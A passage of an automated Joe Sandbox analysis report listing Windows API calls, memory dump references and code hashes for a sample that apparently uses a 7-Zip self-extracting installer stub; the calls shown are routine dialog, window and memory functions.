                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@
                                                                                • String ID:
                                                                                • API String ID: 4113381792-0
                                                                                • Opcode ID: 7c2402dd2d2612712331e06f43e5c3b6258d2d67975131c9b8b2d2ffc34a34aa
                                                                                • Instruction ID: e009749836a5b8c521700d779fd130da81b0f30b20586917bece67503c0bf7cf
                                                                                • Opcode Fuzzy Hash: 7c2402dd2d2612712331e06f43e5c3b6258d2d67975131c9b8b2d2ffc34a34aa
                                                                                • Instruction Fuzzy Hash: 91F117719002499FCB25DF69C8809EE7BF6BF48344F14406EF81997262DB39E985CF58
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00415AAE
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00415AB9
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00415AC4
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00415ACF
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00415ADA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00415AE5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415AF0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415AFB
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00415B03
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?), ref: 00415B0B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?), ref: 00415B13
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00415B1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: e68277fbd99c3745330440203d9bef5d83ad1bd86ee1276d15dbf0581265652b
                                                                                • Instruction ID: aedf86548abd3be3b1bfa100c5c76d75fd36fa784b4736098e5a7a93d74d5829
                                                                                • Opcode Fuzzy Hash: e68277fbd99c3745330440203d9bef5d83ad1bd86ee1276d15dbf0581265652b
                                                                                • Instruction Fuzzy Hash: 29F05930110A11BAE6123732DC1ABDAB6B7AF40304F04442FF59B50435CB557CD1D75D
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 0040819E
                                                                                • GetWindowLongW.USER32(00000000), ref: 004081A5
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 004081BB
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 004081DC
                                                                                • GetSystemMetrics.USER32(00000031), ref: 004081EE
                                                                                • GetSystemMetrics.USER32(00000032), ref: 004081F5
                                                                                • GetWindowDC.USER32(?), ref: 00408207
                                                                                • GetWindowRect.USER32(?,?), ref: 00408214
                                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00408248
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00408250
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                • String ID:
                                                                                • API String ID: 2586545124-0
                                                                                • Opcode ID: 83057c79f2c88d391f1805632dc92285a4e3022d2fadc16537eed77f9a906b47
                                                                                • Instruction ID: f279ad638593bb0c02c28414326814beda2d9d37ba4553b1ab7b6853af478c25
                                                                                • Opcode Fuzzy Hash: 83057c79f2c88d391f1805632dc92285a4e3022d2fadc16537eed77f9a906b47
                                                                                • Instruction Fuzzy Hash: 08310A7650120ABFDB019FB8DE48EEF3B69FB08351F008525FA11E6291CB75D920DB65
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,004178C8,?,?,?), ref: 004156AD
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,004178C8,?,?,?), ref: 004156B5
                                                                                • ??3@YAXPAX@Z.MSVCRT(40000000,?,?,00000000,004178C8,?,?,?), ref: 004156BD
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156C5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156CD
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156D5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156DD
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156E5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156ED
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156F5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: b95c2f54f42df379709473a9b97638e1ea7083fb856c4dc08ffcd234219093be
                                                                                • Instruction ID: 89fa2ea9e7dfd86616dbeeb867654c6fb378e0e89a7fbb9e23d32919dde88c48
                                                                                • Opcode Fuzzy Hash: b95c2f54f42df379709473a9b97638e1ea7083fb856c4dc08ffcd234219093be
                                                                                • Instruction Fuzzy Hash: 66F0EE314115127EEB623B23DD1B9867AB3BF04718358552EF84710C3ADB567CE1DA4C
                                                                                APIs
                                                                                  • Part of subcall function 00409278: memset.MSVCRT ref: 004092CA
                                                                                  • Part of subcall function 00409278: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004092DE
                                                                                  • Part of subcall function 00409278: SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 004092FE
                                                                                  • Part of subcall function 00409278: GetDlgItem.USER32(?,000004B7), ref: 00409311
                                                                                  • Part of subcall function 00409278: SetWindowLongW.USER32(00000000,000000FC,Function_00008190), ref: 0040931F
                                                                                  • Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
                                                                                  • Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF
                                                                                  • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31
                                                                                • GetDlgItem.USER32(?,000004B6), ref: 0040960C
                                                                                • DestroyWindow.USER32(00000000), ref: 0040960F
                                                                                • CreateWindowExA.USER32(00000200,Edit,0041AE2A,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 00409645
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00409655
                                                                                • GetDlgItem.USER32(?,000004B6), ref: 00409662
                                                                                • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 0040966C
                                                                                • GetDlgItem.USER32(?,000004B6), ref: 00409676
                                                                                • SetFocus.USER32(00000000), ref: 00409679
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystemmemset
                                                                                • String ID: Edit
                                                                                • API String ID: 1904772019-554135844
                                                                                • Opcode ID: 0be7facc3e4f8ba872de67d6a079024a8f22cb4c18f1c79b82132ec26fa154f1
                                                                                • Instruction ID: 8a86f020cb998119f4c04dc0e8788b762e1a6262d45705b8329d94c27ff92963
                                                                                • Opcode Fuzzy Hash: 0be7facc3e4f8ba872de67d6a079024a8f22cb4c18f1c79b82132ec26fa154f1
                                                                                • Instruction Fuzzy Hash: EB115171A40208BBDB119BE5CD49FAFBBBDEF89B04F10442AF611F6190C675AD108B29
                                                                                APIs
                                                                                  • Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
                                                                                  • Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
                                                                                  • Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000032), ref: 00408F80
                                                                                  • Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000031), ref: 00408F85
                                                                                  • Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
                                                                                  • Part of subcall function 00408F3F: LoadImageW.USER32(00000000), ref: 00408F91
                                                                                  • Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
                                                                                  • Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FD7
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FE1
                                                                                  • Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
                                                                                  • Part of subcall function 00408F3F: SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 0040900A
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 00409018
                                                                                  • Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
                                                                                  • Part of subcall function 00408F3F: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
                                                                                  • Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00409040
                                                                                  • Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
                                                                                  • Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF
                                                                                  • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31
                                                                                • ClientToScreen.USER32(?,?), ref: 004098AE
                                                                                • GetWindowRect.USER32(?,?), ref: 004098C1
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 004098D9
                                                                                • SetWindowLongW.USER32(?,000000F0,00800000), ref: 004098EF
                                                                                • SetWindowLongW.USER32(?,000000EC,00000008), ref: 004098F8
                                                                                • GetWindowRect.USER32(?,?), ref: 00409901
                                                                                  • Part of subcall function 00407BA4: GetDlgItem.USER32(?,?), ref: 00407BC2
                                                                                  • Part of subcall function 00407BA4: SetWindowPos.USER32(00000000), ref: 00407BC9
                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00409928
                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00409935
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00409942
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409951
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
                                                                                • String ID:
                                                                                • API String ID: 1121484998-0
                                                                                • Opcode ID: 896a1083596387c429694cdeec32fa87b02d5184d92bc3279f9fd5c98c9e356b
                                                                                • Instruction ID: 9fdbf200746135bab5730a4dafb3ad07ec8a2d1c31f6c6808a3a3c7848768d2e
                                                                                • Opcode Fuzzy Hash: 896a1083596387c429694cdeec32fa87b02d5184d92bc3279f9fd5c98c9e356b
                                                                                • Instruction Fuzzy Hash: 45310171A00219BFDB11DBA9CD45EAFBBBDFF48710F104129F525F22A1CB74A9108B69
                                                                                APIs
                                                                                  • Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                  • Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                  • Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B36
                                                                                • _wtol.MSVCRT ref: 00409B5F
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B70
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409BBC
                                                                                • _wtol.MSVCRT ref: 00409BE5
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00409E33,?,0041E7B8), ref: 00409BF0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409C02
                                                                                  • Part of subcall function 004119E1: memcpy.MSVCRT(?,00000000,DA,DA,.\/,?,00000000,00409BAE,00000002,-00000002,?,?,0041E844,00000000), ref: 00411A0F
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$_wtol$??2@
                                                                                • String ID: .\/
                                                                                • API String ID: 211236615-1884134905
                                                                                • Opcode ID: 99e9612978a03b7b9cc33154d1e6ca788a3612bce54da366c8f2b9a248262d29
                                                                                • Instruction ID: 0b6a9690c019190aaa6ec8925b5ba1fe496bdf8c1da3795196df282918bb7362
                                                                                • Opcode Fuzzy Hash: 99e9612978a03b7b9cc33154d1e6ca788a3612bce54da366c8f2b9a248262d29
                                                                                • Instruction Fuzzy Hash: 1C41A331A04106ABCB15EF69DC919EEB7B5FF14318B14843EE512B72E2EB78AC41C748
                                                                                APIs
                                                                                  • Part of subcall function 004117A8: ??2@YAPAXI@Z.MSVCRT(?,?,00920F20,00000000,?,00404066,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 004117CA
                                                                                  • Part of subcall function 004117A8: ??3@YAXPAX@Z.MSVCRT(00920F20,?,?,00920F20,00000000,?,00404066,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 004117D4
                                                                                  • Part of subcall function 0041170C: memcpy.MSVCRT(?,?,?,?,?,00920F20,00000000,00404083,?,00920F20,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 0041172D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00920F20,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 00404090
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,-00000001,?,?,?,00920F20,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 004040B1
                                                                                • wsprintfA.USER32 ref: 004040D5
                                                                                • wsprintfA.USER32 ref: 00404102
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$wsprintf$??2@memcpy
                                                                                • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                • API String ID: 1376779256-695273242
                                                                                • Opcode ID: c8f8111b7421c4f5469c19c34ddd9f84d76b7a4cb28d77ac7facfbb57728b8b2
                                                                                • Instruction ID: f21a7fe07a8f386c91366acc762034fd49372255a28dee344885964aedd3aa00
                                                                                • Opcode Fuzzy Hash: c8f8111b7421c4f5469c19c34ddd9f84d76b7a4cb28d77ac7facfbb57728b8b2
                                                                                • Instruction Fuzzy Hash: 83218775A00109ABDB05F7A5D882AFE77BE9F44305F24402BF601B3292CF385E8497A9
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000004B3), ref: 004078A8
                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004078BB
                                                                                • GetDlgItem.USER32(?,000004B4), ref: 004078C5
                                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004078CD
                                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004078DD
                                                                                • GetDlgItem.USER32(?,?), ref: 004078E6
                                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004078EE
                                                                                • GetDlgItem.USER32(?,?), ref: 004078F7
                                                                                • SetFocus.USER32(00000000,?,?,00000000,0040851A,000004B3,00000000,?,000004B3), ref: 004078FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$Focus
                                                                                • String ID:
                                                                                • API String ID: 3946207451-0
                                                                                • Opcode ID: 6496da3c9c0f305d28eaa89951ba916d2429e6ba680465666632d837b6b77d3e
                                                                                • Instruction ID: 223abb1aad09d6feda2c47f27d25d20709fdb3fcd92210378734137cee04cabe
                                                                                • Opcode Fuzzy Hash: 6496da3c9c0f305d28eaa89951ba916d2429e6ba680465666632d837b6b77d3e
                                                                                • Instruction Fuzzy Hash: 37F04F712403087BEA212B61DD86F5BBB5EEF85B54F018425F750650F0CBB7EC209A29
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040897E
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                • GetDlgItem.USER32(?,000004B8), ref: 004089A2
                                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004089AF
                                                                                • wsprintfW.USER32 ref: 004089CF
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004089ED
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A7B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
